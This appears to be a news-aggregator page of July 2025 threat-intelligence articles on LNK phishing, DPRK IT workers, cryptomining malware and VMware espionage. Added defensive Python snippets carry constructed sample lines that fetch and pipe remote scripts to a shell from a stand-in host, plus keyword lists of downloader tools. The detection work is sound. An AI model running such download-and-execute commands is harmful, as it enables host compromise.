    The targeting of Türkiye by the hacking group points to an expansion of its targeting footprint, using malicious Windows shortcut (LNK) files distributed via phishing emails as a starting point to kick-off the multi-stage infection process.

    Specifically, the LNK file is designed to invoke PowerShell commands that are responsible for fetching additional payloads from an external server (“expouav[.]org”), a domain created on June 25, 2025, that hosts a PDF lure mimicking an international conference on unmanned vehicle systems, details of which are hosted on the legitimate waset[.]org website.
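    A parser for the shortcut format, added here as an example (it is not Arctic Wolf's or the article's code) to show what a triage script pulls out of such a file: the 76-byte ShellLinkHeader, the StringData fields that hold the target and its arguments, and a few heuristics over them. The sample shortcuts are built inline by build_lnk, and the PowerShell command line in the lure sample is hypothetical; nothing here reproduces the campaign's actual command.

```python
"""Parse a Windows shortcut (.LNK) header and StringData and flag shortcuts
whose target or arguments launch PowerShell with download-cradle style options.
Added example, not Arctic Wolf's or the article's code; samples are constructed."""
import struct
import uuid

LNK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046")
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
SW_SHOWMINNOACTIVE = 7  # ShowCommand value that starts the target minimized

STRING_FIELDS = ((HAS_NAME, "name"), (HAS_REL_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGS, "arguments"),
                 (HAS_ICON, "icon_location"))


def build_lnk(relative_path, arguments, name="", show_command=1):
    """Minimal unicode .LNK: ShellLinkHeader, StringData, terminal ExtraData block."""
    flags = IS_UNICODE | HAS_REL_PATH | HAS_ARGS | (HAS_NAME if name else 0)
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID.bytes_le, flags,
                         0x20, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)

    def sd(text):  # CountCharacters (u16) followed by UTF-16LE characters, no terminator
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    body = (sd(name) if name else b"") + sd(relative_path) + sd(arguments)
    return header + body + struct.pack("<I", 0)


def parse_lnk(blob):
    """Return the StringData fields plus ShowCommand; skips IDList and LinkInfo."""
    size, clsid, flags = struct.unpack_from("<I16sI", blob, 0)
    if size != 0x4C or uuid.UUID(bytes_le=clsid) != LNK_CLSID:
        raise ValueError("not a shell link file")
    show_command = struct.unpack_from("<I", blob, 60)[0]
    off = 0x4C
    if flags & HAS_ID_LIST:                       # LinkTargetIDList: u16 size + bytes
        off += 2 + struct.unpack_from("<H", blob, off)[0]
    if flags & HAS_LINK_INFO:                     # LinkInfoSize counts itself
        off += struct.unpack_from("<I", blob, off)[0]
    unicode = bool(flags & IS_UNICODE)
    fields = {"show_command": show_command}
    for bit, key in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", blob, off)[0]
        off += 2
        nbytes = count * 2 if unicode else count
        fields[key] = blob[off:off + nbytes].decode("utf-16-le" if unicode else "cp1252")
        off += nbytes
    return fields


CRADLE_MARKERS = ("invoke-webrequest", "iwr", "downloadstring", "downloadfile",
                  "invoke-expression", "iex", "frombase64string", "-enc", "http://", "https://")


def assess(fields):
    """Reasons a shortcut deserves a second look; an empty list means nothing matched."""
    cmd = f"{fields.get('relative_path', '')} {fields.get('arguments', '')}".lower()
    reasons = []
    if "powershell" in cmd or "pwsh" in cmd:
        reasons.append("launches PowerShell")
        if any(m in cmd for m in CRADLE_MARKERS):
            reasons.append("download/decode cradle in arguments")
        if "-w hidden" in cmd or "-windowstyle hidden" in cmd:
            reasons.append("hidden window")
        if "-nop" in cmd or "-ep bypass" in cmd or "-executionpolicy bypass" in cmd:
            reasons.append("profile/execution-policy evasion flags")
    if fields.get("show_command") == SW_SHOWMINNOACTIVE:
        reasons.append("ShowCommand SW_SHOWMINNOACTIVE")
    return reasons


# Constructed samples: a hypothetical lure shortcut and a benign document shortcut.
LURE_LNK = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    r'-nop -w hidden -c "iwr https://example.invalid/conf.pdf -OutFile $env:TEMP\conf.pdf; '
    r'Start-Process $env:TEMP\conf.pdf"',
    name="UAV Conference Invitation.pdf", show_command=SW_SHOWMINNOACTIVE)
BENIGN_LNK = build_lnk(r"..\..\Program Files\Reader\reader.exe", r'"C:\Docs\agenda.pdf"')
```

The heuristics are deliberately coarse (substring checks on the lowercased command line); in practice they are the first pass that decides which shortcuts go to a sandbox, and the parsed RelativePath and CommandLineArguments are what you pivot on for hunting across a mail corpus.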

    “The PDF document serves as a visual decoy, designed to distract the user while the rest of the execution chain runs silently in the background,” Arctic Wolf said. “This targeting occurs as Türkiye commands 65% of the global UAV export market and develops critical hypersonic missile capabilities, while simultaneously strengthening defense ties with Pakistan during a period of heightened India-Pakistan tensions.”

    Among the downloaded artifacts is a malicious DLL that’s launched using DLL side-loading by means of a scheduled task, ultimately leading to the execution of shellcode that carries out extensive reconnaissance of the compromised host, including taking screenshots, and exfiltrating the details back to the server.

    “This represents a significant evolution of this threat actor’s capabilities, transitioning from the x64 DLL variants observed in November 2024, to the current x86 PE executables with enhanced command structures,” the company said. “Dropping Elephant demonstrates continued operational investment and development through architectural diversification from x64 DLL to x86 PE formats, and enhanced C2 protocol implementation through impersonation of legitimate websites.”


    Source: thehackernews.com…

  • U.S. Sanctions Firm Behind N. Korean IT Scheme; Arizona Woman Jailed for Running Laptop Farm

    Jul 25, 2025 | Ravie Lakshmanan | Cybercrime / Insider Threat

    The U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC) sanctioned a North Korean front company and three associated individuals for their involvement in the fraudulent remote information technology (IT) worker scheme designed to generate illicit revenues for Pyongyang.

    The sanctions target Korea Sobaeksu Trading Company (aka Sobaeksu United Corporation), and Kim Se Un, Jo Kyong Hun, and Myong Chol Min for evading sanctions imposed by the U.S. and the United Nations against the Democratic People’s Republic of Korea (DPRK) government.

    “Our commitment is clear: Treasury, as part of a whole-of-government effort, will continue to hold accountable those who seek to infiltrate global supply chains and enable the sanctions evasion activities that further the Kim regime’s destabilizing agenda,” said Director of OFAC Bradley T. Smith.


    The latest action marks the U.S. government’s continued efforts to dismantle North Korea’s wide-ranging revenue generation schemes and fund its illegal nuclear and ballistic missile programs.

    The IT worker scheme, which has grown into a global threat, involves the DPRK regime dispatching highly skilled IT workers to locations including China, Russia, and Vietnam, from where they obtain remote jobs at U.S. companies and elsewhere using a combination of fraudulent documents, stolen identities, and false personas, often with help from facilitators who run laptop farms.

    In what has been described as a recurring, if “baffling,” theme, many of these fake workers have been found to use Minions and other Despicable Me characters in social-media profiles and email addresses.

    “The DPRK government withholds most of the wages earned by IT workers, generating hundreds of millions of dollars in revenue to support the North Korean regime’s unlawful weapons of mass destruction and ballistic missile programs,” the Treasury said. “In some cases, these DPRK IT workers have introduced malware into company networks to exfiltrate proprietary and sensitive data.”

    The development comes merely weeks after OFAC sanctioned Song Kum Hyok, a 38-year-old member of a North Korean hacking group called Andariel, for his role in the IT worker scheme.

    In related news, Christina Marie Chapman, 50, of Arizona, was sentenced to 8.5 years in prison for running a laptop farm for IT workers to give the impression that they were working remotely within the U.S. when, in reality, they were logging into those machines remotely. Chapman pleaded guilty earlier this February.

    The impacted companies included a top-five major television network, a Silicon Valley technology company, an aerospace manufacturer, an American car maker, a luxury retail store, and a U.S. media and entertainment company. The IT workers also unsuccessfully attempted to land jobs at two different U.S. government agencies.


    The U.S. Federal Bureau of Investigation (FBI) seized more than 90 laptops from Chapman’s home during an October 2023 raid. Chapman is also said to have 49 laptops at locations overseas, including multiple shipments to a Chinese city on the North Korean border.

    In all, the elaborate counterfeit operation netted more than $17 million in illicit revenue for Chapman and North Korea from October 2020 to October 2023. Chapman has also been ordered to serve three years of supervised release, to forfeit $284,556 that was to be paid to the North Koreans, and to pay a judgment of $176,850.

    “Christina Chapman perpetrated a years’ long scheme that resulted in millions of dollars raised for the DPRK regime, exploited more than 300 American companies and government agencies, and stole dozens of identities of American citizens,” said Acting Assistant Attorney General Matthew R. Galeotti of the Justice Department’s Criminal Division.


    Source: thehackernews.com…

  • Cyber Espionage Campaign Hits Russian Aerospace Sector Using EAGLET Backdoor


    Jul 25, 2025 | Ravie Lakshmanan | Cyber Espionage / Malware


    Russian aerospace and defense industries have become the target of a cyber espionage campaign that delivers a backdoor called EAGLET to facilitate data exfiltration.

    The activity, dubbed Operation CargoTalon, has been assigned to a threat cluster tracked as UNG0901 (short for Unknown Group 901).

    “The campaign is aimed at targeting employees of Voronezh Aircraft Production Association (VASO), one of the major aircraft production entities in Russia, using товарно-транспортная накладная (TTN, consignment note) documents — critical to Russian logistics operations,” Seqrite Labs researcher Subhajeet Singha said in an analysis published this week.

    The attack commences with a spear-phishing email bearing cargo delivery-themed lures that contain a ZIP archive, within which is a Windows shortcut (LNK) file that uses PowerShell to display a decoy Microsoft Excel document, while also deploying the EAGLET DLL implant on the host.


    The decoy document, per Seqrite, references Obltransterminal, a Russian railway container terminal operator that was sanctioned by the U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC) in February 2024.

    EAGLET is designed to gather system information and establish a connection to a hard-coded remote server (“185.225.17[.]104”) in order to process the HTTP response from the server and extract the commands to be executed on the compromised Windows machine.

    The implant supports shell access and the ability to upload/download files, although the exact nature of the next-stage payloads delivered through this method is unknown, given that the command-and-control (C2) server is currently offline.

    Seqrite said it also uncovered similar campaigns targeting the Russian military sector with EAGLET, as well as source code and targeting overlaps with another threat cluster tracked as Head Mare, which is known to target Russian entities.

    This includes the functional parallels between EAGLET and PhantomDL, a Go-based backdoor with a shell and file download/upload feature, as well as the similarities in the naming scheme used for the phishing message attachments.


    The disclosure comes as the Russian state-sponsored hacking group called UAC-0184 (aka Hive0156) has been attributed to a fresh attack wave targeting victims in Ukraine with Remcos RAT as recently as this month.

    While the threat actor has a history of delivering Remcos RAT since early 2024, newly spotted attack chains distributing the malware have been simplified, employing weaponized LNK or PowerShell files to retrieve the decoy file and the Hijack Loader (aka IDAT Loader) payload, which then launches Remcos RAT.

    “Hive0156 delivers weaponized Microsoft LNK and PowerShell files, leading to the download and execution of Remcos RAT,” IBM X-Force said, adding it “observed key decoy documents featuring themes that suggest a focus on the Ukrainian military and evolving to a potential wider audience.”


    Source: thehackernews.com…

  • Soco404 and Koske Malware Target Cloud Services with Cross-Platform Cryptomining Attacks


    Jul 25, 2025 | Ravie Lakshmanan | Malware / Cloud Security


    Threat hunters have disclosed two different malware campaigns that have targeted vulnerabilities and misconfigurations across cloud environments to deliver cryptocurrency miners.

    The threat activity clusters have been codenamed Soco404 and Koske by cloud security firms Wiz and Aqua, respectively.

    Soco404 “targets both Linux and Windows systems, deploying platform-specific malware,” Wiz researchers Maor Dokhanian, Shahar Dorfman, and Avigayil Mechtinger said. “They use process masquerading to disguise malicious activity as legitimate system processes.”

    The Soco404 name refers to the fact that the payloads are embedded in fake 404 HTML pages hosted on websites built with Google Sites. Google has since taken the bogus sites down.

    Wiz posited that the campaign, which has previously been observed going after Apache Tomcat services with weak credentials as well as vulnerable Apache Struts and Atlassian Confluence servers via the Sysrv botnet, is part of a broader crypto-scam infrastructure that includes fraudulent cryptocurrency trading platforms.


    The latest campaign has also been found to target publicly accessible PostgreSQL instances, with the attackers also abusing compromised Apache Tomcat servers to host payloads tailored for both Linux and Windows environments. The attackers additionally compromised a legitimate Korean transportation website and used it for malware delivery.

    Once initial access is obtained, PostgreSQL’s COPY … FROM PROGRAM command is abused to run arbitrary shell commands on the host as the database server’s operating-system user, achieving remote code execution. COPY … PROGRAM is a documented feature rather than a bug, and it is restricted to superusers and members of the pg_execute_server_program role, so the technique presupposes a database login that already holds those rights.

    “The attacker behind Soco404 appears to be conducting automated scans for exposed services, aiming to exploit any accessible entry point,” Wiz said. “Their use of a wide range of ingress tools, including Linux utilities like wget and curl, as well as Windows-native tools such as certutil and PowerShell, highlights an opportunistic strategy.”
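    Detection logic for the two preceding paragraphs, the COPY … PROGRAM abuse and the ingress tools Wiz lists, added here as an example and not Wiz's code: it scans PostgreSQL server log lines for statements that run a program through COPY and marks those whose command invokes a downloader. The log excerpt is constructed in the shape PostgreSQL emits with `log_line_prefix = '%m [%p] '` and `log_statement = 'all'` (if your prefix differs, adjust the `STATEMENT` pattern); the hostnames and PIDs are invented.

```python
import re

# Constructed PostgreSQL server log excerpt; not real Soco404 telemetry.
SAMPLE_LOG = """\
2025-07-24 10:01:02.123 UTC [4151] LOG:  statement: SELECT version();
2025-07-24 10:01:05.456 UTC [4151] LOG:  statement: COPY t FROM PROGRAM 'curl -fsSL http://example.invalid/x.sh | sh';
2025-07-24 10:01:05.789 UTC [4152] LOG:  statement: copy users to '/tmp/out.csv';
2025-07-24 10:01:06.000 UTC [4153] LOG:  statement: COPY (SELECT 1) TO PROGRAM 'wget -q http://example.invalid/drop -O /tmp/d';
2025-07-24 10:01:07.000 UTC [4154] LOG:  statement: CREATE TABLE cmd_exec(cmd_output text);
"""

# One logged statement: timestamp, backend PID, then the SQL text.
STATEMENT = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+ \S+) \[(?P<pid>\d+)\] LOG:  statement: (?P<sql>.*)$"
)

# COPY ... FROM PROGRAM '<cmd>' and COPY ... TO PROGRAM '<cmd>' (both spawn a shell);
# the quoted command may contain doubled single quotes, which SQL uses as an escape.
COPY_PROGRAM = re.compile(
    r"\bCOPY\b.*?\b(?P<direction>FROM|TO)\s+PROGRAM\s+'(?P<command>(?:[^']|'')*)'",
    re.IGNORECASE | re.DOTALL,
)

# Ingress tools named in the Wiz write-up; matched as whole tokens (or tool.exe).
INGRESS_TOOLS = ("curl", "wget", "certutil", "powershell")


def uses_ingress_tool(command: str) -> bool:
    tokens = re.findall(r"[a-z0-9_.-]+", command.lower())
    return any(tok == tool or tok.startswith(tool + ".") for tok in tokens for tool in INGRESS_TOOLS)


def find_copy_program(log_text: str):
    """Return one record per logged statement that executes a program via COPY."""
    hits = []
    for line in log_text.splitlines():
        m = STATEMENT.match(line)
        if not m:
            continue
        c = COPY_PROGRAM.search(m.group("sql"))
        if not c:
            continue
        command = c.group("command").replace("''", "'")
        hits.append({
            "ts": m.group("ts"),
            "pid": int(m.group("pid")),
            "direction": c.group("direction").upper(),
            "command": command,
            "ingress_tool": uses_ingress_tool(command),
        })
    return hits


if __name__ == "__main__":
    for hit in find_copy_program(SAMPLE_LOG):
        print(hit)
```

    On the prevention side the same fact cuts the other way: if the application role is neither a superuser nor a member of pg_execute_server_program, COPY … PROGRAM fails before any shell is spawned, so a hit in these logs from a role that should not hold those rights is itself evidence of credential compromise or privilege drift.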

    On Linux systems, a dropper shell script is executed directly in memory to download and launch a next-stage payload, while simultaneously taking steps to terminate competing miners to maximize financial gain and limit forensic visibility by overwriting logs associated with cron and wtmp.

    The payload executed in the next-stage is a binary that serves as a loader for the miner by contacting an external domain (“www.fastsoco[.]top”) that’s based on Google Sites.

    The Windows attack chain uses the initial post-exploitation command to download and execute a Windows binary which, like its Linux counterpart, acts as a loader that embeds both the miner and the WinRing0.sys driver, the latter being used to obtain SYSTEM-level privileges.

    On top of that, the malware attempts to stop the Windows event log service and executes a self-deletion command to evade detection.

    “Rather than relying on a single method or operating system, the attacker casts a wide net, deploying whichever tool or technique is available in the environment to deliver their payload,” the company said. “This flexible approach is characteristic of a broad, automated cryptomining campaign focused on maximizing reach and persistence across varied targets.”

    The discovery of Soco404 dovetails with the emergence of a new Linux threat dubbed Koske that’s suspected to be developed with assistance from a large language model (LLM) and uses seemingly innocuous images of pandas to propagate the malware.


    The attack starts with the exploitation of a misconfigured service, such as an exposed JupyterLab instance, to install various scripts extracted from two JPEG images: a C-based rootkit that uses LD_PRELOAD to hide malware-related files, and a shell script that ultimately downloads cryptocurrency miners onto the infected system. Both payloads are executed directly in memory to avoid leaving traces on disk.


    Koske’s end goal is to deploy CPU- and GPU-optimized cryptocurrency miners that use the host’s computational resources to mine 18 distinct coins, including Monero, Ravencoin, Zano, Nexa, and Tari.

    “These images are polyglot files, with malicious payloads appended to the end. Once downloaded, the malware extracts and executes the malicious segments in memory, bypassing antivirus tools,” Aqua researcher Assaf Morag said.

    “This technique isn’t steganography but rather polyglot file abuse or malicious file embedding. This technique uses a valid JPG file with malicious shellcode hidden at the end. Only the last bytes are downloaded and executed, making it a sneaky form of polyglot abuse.”
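    The polyglot abuse Aqua describes, a valid JPEG with the payload appended after the end-of-image marker, as an added example that is neither Aqua's nor Koske's code: it walks the JPEG marker segments to find where the image legitimately ends and reports whatever bytes follow, which is exactly the slice the malware fetches and runs. The JPEG here is a constructed minimal marker stream (SOI, APP0, EOI) standing in for a real photo, and the appended script is invented. Trailing bytes alone are a flag, not a conviction, since some benign tools also leave metadata after EOI, so the classifier only reports what the tail looks like.

```python
import struct

SOI, EOI, SOS, APP0 = 0xD8, 0xD9, 0xDA, 0xE0


def build_polyglot_jpeg(payload: bytes) -> bytes:
    """Constructed stand-in: minimal JPEG marker stream (SOI, APP0/JFIF, EOI) with `payload` after EOI."""
    jfif = b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    header = bytes([0xFF, SOI, 0xFF, APP0]) + struct.pack(">H", len(jfif) + 2) + jfif
    return header + bytes([0xFF, EOI]) + payload


def _marker_at(data: bytes, i: int) -> bool:
    """True if data[i:i+2] is a real marker (not a stuffed 0xFF00 or an RSTn inside scan data)."""
    return data[i] == 0xFF and data[i + 1] != 0x00 and not (0xD0 <= data[i + 1] <= 0xD7)


def jpeg_end_offset(data: bytes):
    """Walk the marker segments; return the offset just past EOI, or None if this is not a JPEG."""
    if len(data) < 4 or data[0] != 0xFF or data[1] != SOI:
        return None
    i, n = 2, len(data)
    while i + 1 < n:
        if data[i] != 0xFF:
            return None
        marker = data[i + 1]
        if marker == 0xFF:                      # fill byte before a marker
            i += 1
            continue
        if marker == EOI:
            return i + 2
        if marker == SOI or marker == 0x01 or 0xD0 <= marker <= 0xD7:
            i += 2                              # standalone markers carry no length
            continue
        if i + 4 > n:
            return None
        seg_len = struct.unpack(">H", data[i + 2:i + 4])[0]
        if seg_len < 2:
            return None
        i += 2 + seg_len
        if marker == SOS:                       # entropy-coded data runs until the next real marker
            while i + 1 < n and not _marker_at(data, i):
                i += 1
    return None


def trailing_payload(data: bytes) -> bytes:
    """Bytes after the image's own end; empty for a clean file or non-JPEG input."""
    end = jpeg_end_offset(data)
    return b"" if end is None else data[end:]


def classify_trailer(data: bytes) -> str:
    tail = trailing_payload(data)
    if not tail:
        return "none"
    if tail.startswith(b"#!"):
        return "script"
    if tail.startswith(b"\x7fELF"):
        return "elf"
    return "unknown"


if __name__ == "__main__":
    sample = build_polyglot_jpeg(b"#!/bin/sh\ncurl -s http://example.invalid/miner | sh\n")
    print(jpeg_end_offset(sample), classify_trailer(sample), trailing_payload(sample)[:20])
```

    Because the payload sits after EOI, image viewers and most content scanners that decode the picture never touch it; a check like this one, run on image objects fetched by hosts that have no business downloading images (a JupyterLab container, for instance), is cheap and catches the whole class rather than a specific sample.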


    Source: thehackernews.com…

  • Overcoming Risks from Chinese GenAI Tool Usage


    Jul 25, 2025 | The Hacker News | Artificial Intelligence / Data Privacy

    A recent analysis of enterprise data suggests that generative AI tools developed in China are being used extensively by employees in the US and UK, often without oversight or approval from security teams. The study, conducted by Harmonic Security, also identifies hundreds of instances in which sensitive data was uploaded to platforms hosted in China, raising concerns over compliance, data residency, and commercial confidentiality.

    Over a 30-day period, Harmonic examined the activity of a sample of 14,000 employees across a range of companies. Nearly 8 percent were found to have used China-based GenAI tools, including DeepSeek, Kimi Moonshot, Baidu Chat, Qwen (from Alibaba), and Manus. These applications, while powerful and easy to access, typically provide little information on how uploaded data is handled, stored, or reused.

    The findings underline a widening gap between AI adoption and governance, especially in developer-heavy organizations where time-to-output often trumps policy compliance.

    If you’re looking for a way to enforce your AI usage policy with granular controls, contact Harmonic Security.

    Data Leakage at Scale

    In total, over 17 megabytes of content were uploaded to these platforms by 1,059 users. Harmonic identified 535 separate incidents involving sensitive information. Nearly one-third of that material consisted of source code or engineering documentation. The remainder included documents related to mergers and acquisitions, financial reports, personally identifiable information, legal contracts, and customer records.

    Harmonic’s study singled out DeepSeek as the most prevalent tool, associated with 85 percent of recorded incidents. Kimi Moonshot and Qwen are also seeing uptake. Collectively, these services are reshaping how GenAI appears inside corporate networks. It’s not through sanctioned platforms, but through quiet, user-led adoption.

    Chinese GenAI services frequently operate under permissive or opaque data policies. In some cases, platform terms allow uploaded content to be used for further model training. The implications are substantial for firms operating in regulated sectors or handling proprietary software and internal business plans.

    Policy Enforcement Through Technical Controls

    Harmonic Security has developed tools to help enterprises regain control over how GenAI is used in the workplace. Its platform monitors AI activity in real time and enforces policy at the moment of use.

    Companies have granular controls to block access to certain applications based on their HQ location, restrict specific types of data from being uploaded, and educate users through contextual prompts.

    Governance as a Strategic Imperative

    The rise of unauthorized GenAI use inside enterprises is no longer hypothetical. Harmonic’s data show that nearly one in twelve employees is already interacting with Chinese GenAI platforms, often with no awareness of data retention risks or jurisdictional exposure.

    The findings suggest that awareness alone is insufficient. Firms will require active, enforced controls if they are to enable GenAI adoption without compromising compliance or security. As the technology matures, the ability to govern its use may prove just as consequential as the performance of the models themselves.

    Harmonic makes it possible to embrace the benefits of GenAI without exposing your business to unnecessary risk.

    Learn more about how Harmonic helps enforce AI policies and protect sensitive data at harmonic.security.

    This article is a contributed piece from one of our valued partners.


    Source: thehackernews.com…

  • Fire Ant Exploits VMware Flaws to Compromise ESXi Hosts and vCenter Environments


    Jul 24, 2025 | Ravie Lakshmanan | Virtualization / Network Security


    Virtualization and networking infrastructure have been targeted by a threat actor codenamed Fire Ant as part of a prolonged cyber espionage campaign.

    The activity, observed this year, is primarily designed to infiltrate organizations’ VMware ESXi and vCenter environments as well as network appliances, Sygnia said in a new report published today.

    “The threat actor leveraged combinations of sophisticated and stealthy techniques creating multilayered attack kill chains to facilitate access to restricted and segmented network assets within presumed to be isolated environments,” the cybersecurity company said.

    “The attacker demonstrated a high degree of persistence and operational maneuverability, operating through eradication efforts, adapting in real time to eradication and containment actions to maintain access to the compromised infrastructure.”

    Fire Ant is assessed to share tooling and targeting overlaps with prior campaigns orchestrated by UNC3886, a China-nexus cyber espionage group known for its persistent targeting of edge devices and virtualization technologies since at least 2022.


    Attacks mounted by the threat actor have been found to establish entrenched control of VMware ESXi hosts and vCenter servers, demonstrating advanced capabilities to pivot into guest environments and bypass network segmentation by compromising network appliances.

    Another noteworthy aspect is the ability of the threat actor to maintain operational resilience by adapting to containment efforts, switching to different tools, dropping fallback backdoors for persistence, and altering network configurations to re-establish access to compromised networks.

    Fire Ant’s breach of the virtualization management layer is achieved by exploiting CVE-2023-34048, a known security flaw in VMware vCenter Server that UNC3886 had exploited as a zero-day for years before VMware (now part of Broadcom) patched it in October 2023.

    “From vCenter, they extracted the ‘vpxuser’ service account credentials and used them to access connected ESXi hosts,” Sygnia noted. “They deployed multiple persistent backdoors on both ESXi hosts and the vCenter to maintain access across reboots. The backdoor filename, hash and deployment technique aligned with the VIRTUALPITA malware family.”

    Also dropped is a Python-based implant (“autobackup.bin”) that provides remote command execution, and file download and upload capabilities. It runs in the background as a daemon.

    Upon gaining unauthorized access to the hypervisor, the attackers are said to have leveraged another flaw in VMware Tools (CVE-2023-20867) to interact directly with guest virtual machines via PowerCLI, as well as interfered with the functioning of security tools and extracted credentials from memory snapshots, including that of domain controllers.

    Some of the other crucial aspects of the threat actor’s tradecraft are as follows –

    • Dropping V2Ray framework to facilitate guest network tunneling
    • Deploying unregistered virtual machines directly on multiple ESXi hosts
    • Breaking down network segmentation barriers and establishing cross-segment persistence
    • Resisting incident response and remediation efforts by re-compromising assets and, in some cases, blending in by renaming payloads to impersonate forensic tools

    The attack chain ultimately opened up a pathway for Fire Ant to maintain persistent, covert access from the hypervisor to guest operating systems. Sygnia also described the adversary as possessing a “deep understanding” of the target environment’s network architecture and policies in order to reach otherwise isolated assets.


    Fire Ant is unusually focused on remaining undetected and leaves a minimal intrusion footprint. This is evidenced in the steps taken by the attackers to tamper with logging on ESXi hosts by terminating the “vmsyslogd” process, effectively suppressing an audit trail and limiting forensic visibility.
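    Two host-side checks that follow from the Fire Ant tradecraft, running VMs that are not in the host's inventory (the "unregistered virtual machines" item in the list above) and a terminated vmsyslogd (the paragraph above), as an added example that is not Sygnia's code. It parses constructed text in the shape of the ESXi commands `vim-cmd vmsvc/getallvms`, `esxcli vm process list` and `ps -c`; the column layouts, the `[datastore] path` to `/vmfs/volumes/datastore/path` mapping and the invented VM names, world IDs and UUIDs are all assumptions (hosts that list datastores by UUID need the `/vmfs/volumes` symlink resolved before the two paths compare equal).

```python
import re

# Constructed sample in the shape of `vim-cmd vmsvc/getallvms`
# (assumed columns: Vmid, Name, File, Guest OS, Version, Annotation).
REGISTERED_VMS = """\
Vmid   Name    File                            Guest OS                 Version   Annotation
1      web01   [datastore1] web01/web01.vmx    rhel8_64Guest            vmx-19
2      dc01    [datastore1] dc01/dc01.vmx      windows2019srv_64Guest   vmx-19
"""

# Constructed sample in the shape of `esxcli vm process list`.
RUNNING_VMS = """\
web01
   World ID: 2100123
   Process ID: 0
   VMX Cartel ID: 2100122
   UUID: 42 1a 0b 3c 7d 9e 4f 10 aa bb cc dd ee ff 00 11
   Display Name: web01
   Config File: /vmfs/volumes/datastore1/web01/web01.vmx

svc-backup
   World ID: 2100456
   Process ID: 0
   VMX Cartel ID: 2100455
   UUID: 42 2b 1c 4d 8e af 50 21 bb cc dd ee ff 00 11 22
   Display Name: svc-backup
   Config File: /vmfs/volumes/datastore1/.hidden/svc-backup.vmx
"""

# Constructed sample in the shape of `ps -c` on an ESXi host
# (assumed columns: WID, CID, WorldName, Command); vmsyslogd is deliberately absent.
PS_OUTPUT = """\
WID      CID      WorldName            Command
2097500  2097500  hostd                /bin/hostd
2097612  2097612  vpxa                 /usr/lib/vmware/vpxa/bin/vpxa
"""

# "<vmid> <name> [<datastore>] <relative path>" rows; the header row has no leading number.
REG_LINE = re.compile(r"^\s*\d+\s+\S+\s+\[(?P<ds>[^\]]+)\]\s+(?P<rel>\S+)")


def parse_registered(text: str) -> set:
    """Config-file paths of every VM in the host inventory, normalised to /vmfs/volumes form."""
    paths = set()
    for line in text.splitlines():
        m = REG_LINE.match(line)
        if m:
            paths.add(f"/vmfs/volumes/{m.group('ds')}/{m.group('rel')}")
    return paths


def parse_running(text: str) -> dict:
    """Map config-file path -> display name for every VMX process currently running."""
    vms, name = {}, None
    for line in text.splitlines():
        if line and not line.startswith(" "):
            name = line.strip()                       # block header is the VM's name
        elif line.strip().startswith("Config File:"):
            vms[line.split(":", 1)[1].strip()] = name
    return vms


def unregistered_running_vms(registered_text: str, running_text: str):
    """VMs with a live VMX process but no inventory entry; these never show up in vCenter."""
    registered = parse_registered(registered_text)
    running = parse_running(running_text)
    return sorted((cfg, nm) for cfg, nm in running.items() if cfg not in registered)


def vmsyslogd_running(ps_text: str) -> bool:
    """True if a vmsyslogd world is present; skips the header row."""
    return any(re.search(r"\bvmsyslogd\b", ln) for ln in ps_text.splitlines()[1:])


if __name__ == "__main__":
    print("unregistered:", unregistered_running_vms(REGISTERED_VMS, RUNNING_VMS))
    print("vmsyslogd running:", vmsyslogd_running(PS_OUTPUT))
```

    Both checks have to run on the host itself (or over SSH from a collector), because the point of Sygnia's finding is that vCenter and guest-level agents do not see either condition: an unregistered VM is invisible to the inventory API, and once vmsyslogd is gone nothing is forwarded to the remote syslog target, so an absent log stream at the collector is itself the alert.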

    The findings underscore a worrying trend involving the persistent and successful targeting of network edge devices by threat actors, particularly those from China, in recent years.

    “This campaign underscores the importance of visibility and detection within the hypervisor and infrastructure layer, where traditional endpoint security tools are ineffective,” Sygnia said.

    “Fire Ant consistently targeted infrastructure systems such as ESXi hosts, vCenter servers, and F5 load balancers. The targeted systems are rarely integrated into standard detection and response programs. These assets lack detection and response solutions and generate limited telemetry, making them ideal long-term footholds for stealthy operation.”


    Source: thehackernews.com…